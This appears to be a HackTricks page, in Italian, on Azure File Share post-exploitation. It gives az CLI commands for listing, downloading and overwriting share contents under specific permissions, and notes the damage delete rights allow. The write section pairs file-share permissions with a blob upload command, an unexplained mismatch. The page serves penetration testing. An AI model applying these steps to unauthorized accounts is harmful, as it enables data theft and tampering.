# Az - File Share Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

File Share Post Exploitation

Per ulteriori informazioni sulle condivisioni di file, controlla:

{{#ref}}
../az-services/az-file-shares.md
{{#endref}}

### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read`

Un principale con questo permesso sarà in grado di **elencare** i file all'interno di una condivisione di file e **scaricare** i file che potrebbero contenere **informazioni sensibili**.
```bash
# List files inside an azure file share
az storage file list \
--account-name <name> \
--share-name <share-name> \
--auth-mode login --enable-file-backup-request-intent

# Download an specific file
az storage file download \
--account-name <name> \
--share-name <share-name> \
--path <filename-to-download> \
--dest /path/to/down \
--auth-mode login --enable-file-backup-request-intent
```
### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write`, `Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action`

Un principal con questo permesso sarà in grado di **scrivere e sovrascrivere file nelle condivisioni di file**, il che potrebbe consentirgli di causare danni o addirittura di elevare i privilegi (ad esempio, sovrascrivere del codice memorizzato in una condivisione di file):
```bash
az storage blob upload \
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite
```
### \*/delete

Questo permetterebbe di eliminare file all'interno del filesystem condiviso, il che potrebbe **interrompere alcuni servizi** o far perdere al cliente **informazioni preziose**.

{{#include ../../../banners/hacktricks-training.md}}
